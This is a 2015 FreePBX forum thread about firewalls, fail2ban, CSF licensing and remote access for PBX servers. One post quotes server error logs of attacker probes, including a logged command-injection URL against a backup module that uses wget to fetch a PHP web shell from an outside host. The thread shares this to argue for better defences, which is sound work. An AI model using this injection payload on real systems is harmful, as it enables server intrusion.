A challenge to all FreePBX based Distros


#25

Here is a demonstration of a an attack from

host 5.196.91.180 in network 5.196.0.0/16       # RIPE    FR FR-OVH-20120823                          OVH SAS


[root@localhost ~]# cat /var/log/httpd/error_log |grep 5.196.91.180
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/saky.php' not found or unable to stat
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/k4ijo.php' not found or unable to stat
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/alex.php' not found or unable to stat
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php, referer: http://1337s.cc/index.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] script '/var/www/html/recordings/misc/index.php' not found or unable to stat, referer: http://1337s.cc/index.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] script '/var/www/html/recordings/misc/index.php' not found or unable to stat
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/ama.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/Do_Me.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/ama.php

You will see that over days that he is probing for known vulnerabilities (the old hands will perhaps recognize the vulnerabilities), then a couple of days later he tries to inject unsuccessfully

http://1337s.cc/index.php

The interesting correlation is

cat /var/log/httpd/error_log |grep MAYET
[Fri Jun 12 11:00:46 2015] [error] [client 81.10.94.241] File does not exist: /var/www/html/favicon.ico, referer: http://162.42.215.183/admin/modules/backup/page.backup.php?action=deletedataset&dir=%27;wget%20http://184.107.105.35/classes/ELMAYET_ELMAYET.txt%20%20-O%20zz.php;%20echo%20%27mission%20done
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php

One directed google for MAYET would find a guy in South Africa who is an expert in VOIP and security (I’m sure his work was stolen), but if you read the script

http://184.107.105.35/classes/ELMAYET_ELMAYET.txt

(zz.php) it would really be quite devastating if it got on your machine, here apache-nohome jail would have caught him on Thu Jun 11 16:30:26 2015. You should reasonably use a long bantime to mitigate the threat.

Yes this was a failed attempt, but as you see the risk is real and on this machine a related but more robust attack would expose the server to penetration needlessly.

Food for thought maybe? or just should we sweep it under the rug :wink:


#26

(to this and the next message)
Interesting, indeed.

Can we treat this in stages, probably?

  • pre-requisite: set up wireshark or something like that on separate machine (or separate VM maybe even better), adjacent to the one you’re looking at, to intercept / look at packet flow incoming to the one where you’ll be installing FreePBX.
  • at the very least record packet source and destination (and src/dst ports) in timely correlation with
  • distro setup (take note of FreePBX servers/mirrors accessed)
    (- system set up, first ever GUI / dashboard /access/login)
  • system up, NOT running asterisk
  • system up, running asterisk but no chan-sip/chan-pjsip / not listening to port 5060
  • system up, running asterisk with channel module as described above (no configuration but a login account on the GUI)
  • (what the above is supposed to track/find, is : are there any hosts on the 'net other than FreePBX Project/Sangoma/Digium etc, that your test machine is sending ANY sort of packets TO at ANY point ? Even the smallest ones.)

Like I said, I find it quite unbelievable, that a newly setup system would ‘just’ get itself under potential bruteforcing or DDoS attack ‘just like that’ without something ‘from inside’ of it letting the invaders know it’s there. Note that ‘something inside’ may also be completely unrelated to Asterisk.

Hope this helps & that it’s not crazy talk :wink:


#27

You could do all that crazy stuff but the result would not reveal anthing nefarious.
Any unsolicited connection on any port that your server has open will be serviced This includes tcp 5038,22,80,8088 and the one that isymphony uses, also udp 53,69,123,4569,5060 and 5061 on this machine.

Whether you find it believable or not, connections WILL eventually arrive on those ports. At this point in time this machine has only filtered ssh tcp/22 successfully 80 times for 2 hosts out of +14000 total connections from 227 different hosts, a vast majority of which where to to udp/5060 but a significant minority to http “files” and “scripts” that don’t exist.


#28

I wanted to respond to dicko’s original request concerning the need for an open source firewall on all of the aggregations. Couldn’t agree more! For what it’s worth, here’s what we have done thus far with Incredible PBX, and we plan to implement the same methodology in the next iteration of PBX in a Flash. We’ve shared the same setup with the Elastix folks. We use a combination of IPtables, Fail2Ban, Port Knocker, and VPNs to lock down servers as part of the base install using a whitelist of local IP addresses, ITSP’s, and the IP addresses of the server itself and the desktop machine from which the server was created. Users can add/delete whitelist entries using simple scripts. Entries can be either IP addresses, ranges of IP addresses, or FQDNs. Port Knocker assures that nobody ever gets locked out of their server because of a missing whitelist address. We would be more than happy to share our GPL tools with anyone deploying GPL-based systems.

As a general rule, we’ve concluded that blacklists don’t work. They either get poisoned by nefarious activity from the bad guys themselves, or they drive everyone crazy trying to keep them updated, or the bad guys use compromised (mostly Windows) PCs to gain access. Having said that, country-specific blacklists work pretty well to at least reduce exposure from countries that should never have access to your server. We’ve had good results with ipset except with OpenVZ cloud-based servers. ipset hooks into the kernel just like IPtables. Here is a tutorial that will show you how to set it up: http://pbxinaflash.com/community/index.php?resources/iptables-blacklist-countries.45/

We appreciate that whitelists cause problems for remote users, especially the technically challenged who frequently travel to different places. Port Knocker works great to quickly open up IPtables for remote access with one button click from any smartphone. VPN access from a smartphone is our preferred remote access approach. Dynamic DNS also is an option for Android users. Unfortunately, it doesn’t work with iPhones. For more permanent remote users, e.g. satellite office workers, we recommend either phones with built-in VPNs or FQDNs using dynamic DNS tools on both the server and remote site.


#29

Thanks Ward , the first on topic reply yet :slight_smile:

As to VPN’s, and given their known insecurities (google it) Are yours absolutely limited to SIP/IAX2 and related connections if appropriate? If not you open up a whole new ballgame on your internal network’s firewall needs also, wild androids, windows apple machines running rampant on your network with no curbs as to what they can do?, what could possibly go wrong here ?

(Come on guys 400 odd reads in a week and nobody has ANYTHING to say ? . . .)


#30

@dicko: A challenge to all FreePBX based Distros was not on topic ? :smile:

it was you who started the offtopic with the bad IP addresses et al. here :stuck_out_tongue: :slight_smile:

Let me rephrase that:

Almost everyone has different usage conditions
What works for me, almost certainly won’t work for anybody else unless they have very similar setup.
Therefore just including a ‘firewall builder’ solution into the distro, is going to ultimately end up setting it into most permissive mode possible OOTB, and there is good chance people will leave it like that forever, thus it will become a bloat and a nuisance and a forum post volume pump, instead of having a chance of protecting anything. If you set it to restrictive mode, people will set it to permissive while trying to get things working and then forget to put it into restrictive mode again.
And then there is the thing @TheJames said about packaging security, which I could not have said better either :wink:

What @Ward is describing, and I agree with, is a firewall on all aggregating points. But I’ll argue that a dedicated FreePBX deployment on an appliance does not necessarily count as one (like, mine is behind a specialized gateway/firewall/NAT device) (exception - probably something like PIAF/Elastix installed on your home broadband router with much more limited resources than a dedicated appliance can have; I can recognize that. Would /I/ use it for intra office purposes ? Probably not. But YMMV, or - if it may come to that, who knows… then I would like for such a device to have strongest firewall applicable.)


#31

Whether you agree or not, you NEED a firewall, (you are already using fail2ban, which in your case is currently ineffectual in some deployments) a good firewall will allow what you want and deny what you don’t want., the concept is a simple as that.

As to what you want (which is not the same as what you need ) then use miscellaneous scripts or perhaps use a mature and more than adequate “firewall builder” like CSF

I suggest you read

http://download.configserver.com/csf/readme.txt

for the basic principles, concepts and abilities, It can do a LOT more to monitor your system and then inject in realtime iptables “allows” and “denies” as appropriate than any “miscellaneous script” I know of can.

If your use case is not generally included in that document or you think it is all pixey dust then please suggest an alternative.


#32

https://xkcd.com/386/ :smile:

thx dicko will read later.


#33

May I strongly suggest muting the audio when playing this video. The acoustic guitar rendition of Pacheb
elbel’S canon in D major is really bad musicianship.

:turtle: This turtle could keep better time.


#34

I had been out of the loop lately and had not seen port knocker. it’s a good idea.

I suggested a year ago in my organization that we build a dynamic DNS server. Clients would run the DDNS client. The firewall would then only accept IP traffic from users authenticated on the DDNS platform.

It would stop the drive by hackers dead in their tracks. Securing against a person specifically trying to hack you such as an employee or a customer is a different requirement and a risk most accept for the convenience of remotes access.


(Rob Thomas) #35

Hah. Funny that this post was bubbled up to the top of my thread list, what with the new Firewall module!

Consider your challenge accepted, run with, and complete, @dicko!

As we discussed on IRC, CSF isn’t open source, (in fact, their licence says you can’t even look at the source!) so we couldn’t use that. But I think everyone’s pretty happy with the (100% real AGPL v3+ FOSS) Firewall module.


#36

Well although I can’t agree with your interpretation of their license (and I have talked to them) , I will give you that you perhaps obliquely took up the challenge, so that is excellent.

Completed perhaps, only when running , as you promised, on any FreePBX unconstrained by commercially licensed pre-requirements. I am a old curmudgeon, if you add ipsets and comprehensive forwarding rules and I will sample it again :wink:

Nice work though . .


(Rob Thomas) #37

Here’s the licence I’m looking at: http://download.configserver.com/csf/license.txt That licence contains this section:

3.1	You shall not:
	3.1.1	modify, adapt, merge, translate, decompile, 
	disassemble, or reverse engineer the Product, except as 
	permitted by law; or

If that’s not what they intend, they should fix their licence, because it’s pretty explicit there that you’re not allowed to look at the code, in any way, shape, or form. There’s no exclusion anywhere else that allows you to look at the code, even for evaluation. So, yeah, this is in no way shape or form open source. Really, truly. If they WANT it to be open source, they need to fix that licence. Until then, they can’t claim it’s OSS, or even OSS friendly (as they could at least have an exclusion for use with LGPL code).

Maybe, but there’s no need for it at the moment. Feature request? (But, WHY?)

Never. This is not a network firewall. This is a system firewall. There are plenty of firewalls that handle (easy) network stuff. This is a system firewall, which is hard and complex, and people mess up.


#38

No where does it say you can not read/look at it :wink: It does say you can’t “modify, adapt, merge, translate, decompile, disassemble, or reverse engineer” it or did I miss something in 3.1, In fact you NEED to READ it to understand how it works and how to get the best out of it (ipsets for example) This by my interpretation is encouraged not forbidden.

Because there are connected bot-nets out there, there will always be developing dynamic attack vectors, even the most basic FreePBX installation exposes network services that are vulnerable, even if by drive-by’s , adding dynamic IDS rules like F2B and CSF do by watching connections makes sense to me, generic flood rules will often break imap et al. So FAX2Email/Email2FAX is an example. Specific Asterisk type directed attacks like VTiger/ARI or even I might suggest FreePBX in the past should be scripted.

Pretty well any Linux has iptables as it’s kernel based filter, even if wrapped in systemd/firewalld , As “The Distro” includes Fail2Ban perhaps the recidive jail at least should be dynamically added to you firewall, or are you suggesting that IDS is not needed any more?

I have many NUC’s and PI’s under kitchen sinks somewhere that effectively provide both VOIP and a firewall between COX/COMCAST/ATT and your “connected home” WIFI is cheaper than rewiring a complete house with CAT-5


(Rob Thomas) #39

At least the three of ‘decompile’, ‘disassemble’ and ‘reverse engineer’ cover ‘looking at the source’.

So, yeah, it does say that. Those three things. ‘Reverse Engineer’ covers that even more, as you can’t even attempt to understand what it does. It’s not an open source licence. I don’t know why you’re arguing this? If it was an Open Source licence, it would be open source. Which it’s not.

To quote http://opensource.org/licenses:

Open source licenses are licenses that comply with the Open Source Definition — in brief, they allow software to be freely used, modified, and shared.

It’s not open source. It’s closed source. And because it’s written in Perl, the source is available, so they explicitly deny you the privilege to look at it. Just to make sure that you’re aware that it’s not open source.

At no point in that licence I linked to above is there any wording that encourages or even HINTS that you have permission to look at the source. Nowhere. I read it twice, in full, in case I missed something. It’s not there. So, let’s just move on. CSF is free, but it’s not open source, by any stretch of the imagination. (Exactly like the FreePBX modules Sysadmin or Extension routes.)

Kinda don’t know what you’re getting at there, sorry. If you’re saying you want FreePBX Firewall to be a network firewall, then no, that’s never going to happen, as there’s plenty of other things much better at doing that – for example, the modem that connects you to the internet :sunglasses:


#40

Never mind Rob, I am happy with my solution, and I think it is better than yours and a little more mature, but that’s OK. There are many ways to connect to the internet , in 2015 pretty well none are modems (modulators/demodulators) many call them routers nowadays, I told you I was a curmudgeon, right ?

Your fearless leader says yours is “perfect”, do you agree? :slight_smile:


(Rob Thomas) #41

I’m pretty happy with it. Of course it’s not perfect, but it’s a lot better than anyone else has done so far.

And because it’s open source, anyone else can feel free (without nasty licences telling them that they’re not allowed) to modify, adapt, merge, translate, decompile, disassemble, or reverse engineer the module, or even just ask ‘Why is this there, and what does it do?’

Actually, it hasn’t been translated at all, which is something I need to work on. I think most of it is ready, but I need someone to actually go through weblate.

No, two things. Your ‘internet connection box’ has a Modem, that translates the analog signal coming into it, via cable or ADSL or whatever, into a digital signal, and then a router that does the authentication and routing of that digital signal. Two separate things, same box. In fact, most of them are THREE things, modem, router and access point, all in the same box.


#42

There is NO analog signal in 99.99% of any connections any more to the internet in the USA.


(Matthew B) #43

Nearly all residential broadband is distributed through RF modulated signals. A modem of some sort is still needed.


#44

A fine point for cable connections, but that is docsis , you will only have to worry about that at 4:20 when the kids are looking for porn. That is when it breaks.